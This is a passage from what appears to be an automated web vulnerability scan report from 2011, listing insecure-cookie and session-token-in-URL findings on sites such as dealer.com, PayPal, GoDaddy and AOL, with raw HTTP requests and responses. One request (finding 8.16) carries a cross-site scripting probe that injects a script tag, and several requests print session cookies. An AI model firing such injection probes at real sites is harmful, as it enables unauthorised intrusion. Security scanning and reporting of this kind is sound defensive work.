<title>404 Error Page</title><META name="keywords" content="404 Error Page"><META name="description" content="404
...[SNIP]...
8.16. https://cc.dealer.com/views/forgot-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:22 GMT
Connection: keep-alive
Set-Cookie: ssoid=636fcf5940463812016995a23d400c4d;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3977

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
8.17. https://cc.dealer.com/views/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /views/login HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: cc.dealer.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:09 GMT
Connection: keep-alive
Set-Cookie: ssoid=60ff3811404638d500c85a33429f0cd7;path=/;domain=.dealer.com
Set-Cookie: BIGipServerSecureCC5Pool=805375498.20736.0000; path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11311

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Login</title>

   <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="j
...[SNIP]...
8.18. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Sun, 10 Apr 2011 15:37:48 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 16-Apr-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 24-Apr-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDAUARSRCQ=GLPPJFHBBNEDMGCLDKGAFKGM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 17 Apr 2011 14:17:48 GMT
Connection: close

8.19. https://www.mcafeesecure.com/RatingVerify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RatingVerify HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: McAfeeSecure
Vary: Accept-Encoding
Location: http://www.mcafeesecure.com/
Content-Type: text/html; charset=utf-8
Content-Length: 66
Connection: close
Date: Sun, 17 Apr 2011 14:14:28 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/

The URL has moved <a href="http://www.mcafeesecure.com/">here</a>
8.20. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:20:35 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=UXEHhRignLFVTnbAVbYx_1vwRi191lhkMCn7gduBFxwbbN8SWoAw_nTx-rXGHvgzGLkhlCjuX0g5E7B7FR5Hh2rN6a0v30SnRjnQzcZN6TA5D9aG4xmP92NhvfgZ7MOQI90ruW%7cDdN43k21tDDpjjnO4e_BInxIbzYfiz5PV2_MEy-BabFIN_l0lObhx7xFRNfYq-UjIqZ060%7c3P1ypZI3mYev_wnz6YR7Iq-BvmVjBwnwZgZsyfqQV_yc8V3OHoZsBPqMBl_9lsS_pdXea0%7c1303046436; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=FWsPgNg73q2wIosHLLv5ZATwaiwWwju-w-P3qjeJQboWlPXYArkJ70RMIoWLTxeCI-QCp5cxVpV73b7L; expires=Sat, 12-Apr-2031 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 14-Apr-2021 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 14-Apr-2021 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 12-Apr-2031 13:20:36 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.191.114.147.1303046435466556; path=/; expires=Tue, 09-Apr-41 13:20:35 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
<meta http-equiv="C
...[SNIP]...
9. Session token in URL  previous  next
There are 17 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

9.1. http://aolproductcentral.aol.com/ClickBroker  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://aolproductcentral.aol.com
Path:   /ClickBroker

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /ClickBroker?campaign=03b17d66-f652-449e-80a4-a3be47274af9 HTTP/1.1
Host: aolproductcentral.aol.com
Proxy-Connection: keep-alive
Referer: http://daol.aol.com/security/computer-checkup
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.2b1bc27e5d9811e08af9616a40ee2636.cf55; VWCUKP300=L123100/Q68712_13124_135_040211_1_040311_424842x423979x040211x1x1; s_vi=[CS]v1|26CBEC11051D3387-6000010340009A75[CE]; s_pers=%20s_getnr%3D1303045102168-Repeat%7C1366117102168%3B%20s_nrgvo%3DRepeat%7C1366117102169%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcmp%252Caolsvc%253D%252526pid%25253Dcmp%2525253A%25252520Discover%25252520%2525257C%25252520Internet%25252520Security%25252520Central%2525253ACCU%252526pidt%25253D1%252526oid%25253Djavascript%2525253AohSnapcloud%25252528%25252527pc-tools-and-storage%25252527%2525252C%25252520%25252527aol-computer-checkup-1%25252527%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:58:23 GMT
Set-Cookie: JSESSIONID=BE5C9FA9E34FF10C39966BFE2460F3CE.storefrontus-m02a; Path=/
Set-Cookie: OFBiz.Visitor=1073744; Expires=Mon, 16-Apr-2012 12:58:23 GMT; Path=/
Content-Type: text/html;charset=UTF-8
ntCoent-Length: 33155
Content-Length: 33155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Begin Screen component://gps/widget/gpsScreens.xml#product -->
<!-- Beg
...[SNIP]...
<!-- PRICE END-->
                               <a id="purchaseURL" href="https://aolproductcentral.aol.com/control/additem;jsessionid=BE5C9FA9E34FF10C39966BFE2460F3CE.storefrontus-m02a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup" class="tryitforfree" title="TRY IT FREE">TRY IT FREE</a>
...[SNIP]...
9.2. https://aolproductcentral.aol.com/control/additem  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://aolproductcentral.aol.com
Path:   /control/additem

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /control/additem;jsessionid=ECB401B40469871F10689692AE99A374.storefrontus-m04a?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup-1 HTTP/1.1
Host: aolproductcentral.aol.com
Connection: keep-alive
Referer: http://aolproductcentral.aol.com/ClickBroker?campaign=03b17d66-f652-449e-80a4-a3be47274af9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.2b1bc27e5d9811e08af9616a40ee2636.cf55; VWCUKP300=L123100/Q68712_13124_135_040211_1_040311_424842x423979x040211x1x1; s_vi=[CS]v1|26CBEC11051D3387-6000010340009A75[CE]; s_pers=%20s_getnr%3D1303045102168-Repeat%7C1366117102168%3B%20s_nrgvo%3DRepeat%7C1366117102169%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcmp%252Caolsvc%253D%252526pid%25253Dcmp%2525253A%25252520Discover%25252520%2525257C%25252520Internet%25252520Security%25252520Central%2525253ACCU%252526pidt%25253D1%252526oid%25253Djavascript%2525253AohSnapcloud%25252528%25252527pc-tools-and-storage%25252527%2525252C%25252520%25252527aol-computer-checkup-1%25252527%25252529%2525253B%252526ot%25253DA%3B; JSESSIONID=ECB401B40469871F10689692AE99A374.storefrontus-m04a; OFBiz.Visitor=1073819

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 17 Apr 2011 12:58:29 GMT
Location: https://aolproductcentral.aol.com/control/checkout?categoryId=pc-tools-and-storage&brandName=aol-computer-checkup-1
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=20, max=500
Connection: Keep-Alive

9.3. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=1443&token=NETM7 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:531399.1iolb30nur9ak.0|535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535461.4608069584519221037.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Wed, 11-Apr-2012 12:56:51 GMT; Path=/
Set-Cookie: cwbh1=1443%3B05%2F17%2F2011%3BNETM7; Domain=.contextweb.com; Expires=Mon, 21-Mar-2016 12:56:51 GMT; Path=/
Content-Type: image/gif
Date: Sun, 17 Apr 2011 12:56:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
9.4. http://cc.dealer.com/views/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cc.dealer.com
Path:   /views/login

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://cc.dealer.com/views/login?sessionTimedOut=true">here</a>
...[SNIP]...
9.5. http://cc.dealer.com/views/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://cc.dealer.com
Path:   /views/login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
Location: https://cc.dealer.com/views/login?sessionTimedOut=true
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:39 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://cc.dealer.com/views/login?sessionTimedO
...[SNIP]...
9.6. https://cc.dealer.com/views/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /views/login?sessionTimedOut=true HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.36.10.1303002182

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:41 GMT
Connection: keep-alive
Content-Length: 11402

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Login</title>

   <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="j
...[SNIP]...
9.7. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=1405043;type=onlin776;cat=webro874;ord=1;num=3297651645261.7944? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sun, 17 Apr 2011 13:00:48 GMT
Expires: Sun, 17 Apr 2011 13:00:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 719

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script src="http://
...[SNIP]...
<img src='http://a.rfihub.com/ca.gif?rb=769&ca=20472967&ct=894059542' height=0 width=0 style='display:none' alt='Rocket Fuel'/><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2909&token=WBSW1" width="1" height="1" border="0"></body>
...[SNIP]...
9.8. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=94185b39-ee6d-4902-8b14-ecd540977f9a&hostname=housecall.trendmicro.com&location=%2Fus%2Findex.html&url=http%3A%2F%2Fhousecall.trendmicro.com%2Fus%2Findex.html&sessionID=1303044921690.28305&fpc=e9c3bfd-12f6387996e-57bee0f8-1&ts1303044926993.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sun, 17 Apr 2011 12:57:09 GMT
Connection: keep-alive
Set-Cookie: __stid=CszLBk2q46UTLgrkOxpkAg==; expires=Mon, 16-Apr-12 12:57:09 GMT; domain=.sharethis.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"

9.9. http://mbox9e.offermatica.com/m2/eset/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303045152447-372951&mboxPage=1303045152447-372951&mboxCount=1&mbox=mbx_company_landing&mboxId=0&mboxTime=1303027152504&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fcompany&mboxReferrer=&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 174
Date: Sun, 17 Apr 2011 12:59:15 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_company_landing',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303045152447-372951.17");
9.10. http://tbe.taleo.net/NA8/ats/careers/jobSearch.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://tbe.taleo.net
Path:   /NA8/ats/careers/jobSearch.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /NA8/ats/careers/jobSearch.jsp?org=QUALYS&cws=7 HTTP/1.1
Host: tbe.taleo.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:04:30 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Set-Cookie: JSESSIONID=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm; Path=/NA8/ats
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12210


<html><head><title>Career Opportunities</title></head><body>
<STYLE type="text/css">
body {
padding: 15px;
font-family: Verdana;
font-siz
...[SNIP]...
<br>To fill out a general application form <a tabIndex='29' href='http://tbe.taleo.net/NA8/ats/careers/apply.jsp;jsessionid=EBC74150942B2F30DFBB4F71860DE058.NA8_primary_jvm?org=QUALYS&cws=7'>click here</a>
...[SNIP]...
9.11. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DSP CURa OUR STP COM"
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxSession=1303044923199-20205; Domain=webroot.tt.omtrdc.net; Expires=Sun, 17-Apr-2011 13:27:57 GMT; Path=/m2/webroot
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:56:57 GMT; Path=/m2/webroot
Content-Length: 0
Date: Sun, 17 Apr 2011 12:56:57 GMT
Location: http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true
Server: Test & Target

9.12. http://www.amazon.com/gp/product/0975264001  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0975264001

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /gp/product/0975264001 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:47 GMT
Server: Server
x-amz-id-1: 0TMV7GTM9VSZ67NKEV0Q
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Z0pe41aEyeyhR8T39bmBtjpiPqfY6Jdj2lpjTDa9VnaHLF1JmNVi1YJWUNfkEp1R
